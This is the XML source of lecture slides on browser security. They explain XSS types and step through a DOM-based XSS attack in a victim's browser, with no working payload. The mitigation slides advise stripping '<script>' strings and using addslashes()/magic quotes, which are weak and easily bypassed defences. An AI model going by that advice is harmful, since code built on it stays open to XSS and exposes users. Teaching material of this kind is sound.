      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="24273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 example</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>the victim’s browser receives the above URL and sends a HTTP request to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="558ED5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="558ED5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>www.example.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, receiving the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0"/>
              <a:t>static</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> HTML page described before</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Then, the browser starts building the DOM of the page, and populates the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="558ED5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>document.url</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> property, of the document object with the URL containing the malicious script.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="170436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 example</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>When the browser arrives to the script which gets the user name from the URL, referencing the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="558ED5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>document.url</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> property, it runs it and consequently updates the raw HTML body of the page, resulting in</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457199" y="4487333"/>
            <a:ext cx="8214357" cy="866423"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="419725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 example</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>the browser finds the malicious code in the HTML body and executes it, thus finalizing the DOM XSS attack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>In reality, the attacker would hide the contents of the payload in the URL using encoding so that it is not obvious that the URL contains a script.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="412797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DOM-based XSS mitigation</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>browsers may encode the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="558ED5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="558ED5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> characters in the URL, causing the attack to fail. However there are other scenarios which do not require the use of these characters, nor embedding the code into the URL directly, so these browsers are not entirely immune to this type of attack either.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2705851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types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Persistent (stored)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-514350"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Attack is stored on website’s webserver</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Non-persistent (reflected, type 1, first-order)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-514350"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Victim has to go through a special link to be exposed</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>DOM-based</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-514350"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Problem exists within the client-side scripts</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="207275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Mitigation</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Replace &lt;script&gt; with null string “”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Magic quotes </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>filteration</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-514350"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>E.g., </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>addslashes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>() in PHP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-514350"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-514350"/>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-514350"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Reading exercise: </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>https</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>www.exploit-db.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/docs/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>english</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/18895-complete-cross-site-scripting-walkthrough.pdf</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="19619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Security</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>XSS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>CSRF</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>SOP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Clickjacking</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="339998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XSS</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Subtitle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Cross-site scripting</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="366012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US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Cross-site scripting (XSS) is a type of computer vulnerability typically executed with the help of web-applications through breaches in users’ web-browser.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>It enables attacker to inject client-side script into web-pages viewed by the other users. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>XSS is mostly possible on dynamic websites where input is required.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="176902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types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Persistent (stored)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Non-persistent (reflected)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>DOM-based</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="295671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XSS</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Attack is stored on the website’s webserver</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Example:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Attacker chooses a common vulnerable platform like bulletin-board where victims usually visit</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Attacker makes a post to the bulletin board with attack script encoded within the post content</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Script gets stored on the bulletin board and made available to others thereafter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" smtClean="0"/>
              <a:t>…</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Victims loading </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0"/>
              <a:t>that</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> post into their browsers run the attacker’s script (lose session ID, for example)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="186832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1600"/>
            <a:ext cx="9144000" cy="6637404"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="288201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8900" y="2120900"/>
            <a:ext cx="6426200" cy="2616200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2794000" y="5700889"/>
            <a:ext cx="5298374" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1">
              <a:lumMod val="85000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Improvise the &lt;script&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" smtClean="0"/>
              <a:t>…</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> &lt;/script&gt; portion as you wish</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="400579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239</TotalTime>
  <Words>1014</Words>
  <Application>Microsoft Macintosh PowerPoint</Application>
  <PresentationFormat>On-screen Show (4:3)</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Browser Security</vt:lpstr>
      <vt:lpstr>Background</vt:lpstr>
      <vt:lpstr>Browser Security</vt:lpstr>
      <vt:lpstr>XSS</vt:lpstr>
      <vt:lpstr>XSS</vt:lpstr>
      <vt:lpstr>XSS types</vt:lpstr>
      <vt:lpstr>Persistent XSS</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Reflected XSS</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Reflected XSS</vt:lpstr>
      <vt:lpstr>Reflected XSS</vt:lpstr>
      <vt:lpstr>Reflected XSS Mitigation</vt:lpstr>
      <vt:lpstr>DOM-based XSS</vt:lpstr>
      <vt:lpstr>DOM-based XSS</vt:lpstr>
      <vt:lpstr>DOM-based XSS example</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Dom-based XSS example</vt:lpstr>
      <vt:lpstr>DOM-based XSS example</vt:lpstr>
      <vt:lpstr>DOM-based XSS example</vt:lpstr>
      <vt:lpstr>DOM-based XSS mitigation</vt:lpstr>
      <vt:lpstr>XSS types</vt:lpstr>
      <vt:lpstr>XSS Mitigation</vt:lpstr>
    </vt:vector>
  </TitlesOfParts>
  <Company>grammar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 CSRF, SOP</dc:title>
  <dc:creator>panini</dc:creator>
  <cp:lastModifiedBy>panini</cp:lastModifiedBy>
  <cp:revision>22</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2016-11-24T05:34:50Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2018-01-26T10:07:06Z</dcterms:modified>
</cp:coreProperties>
</file>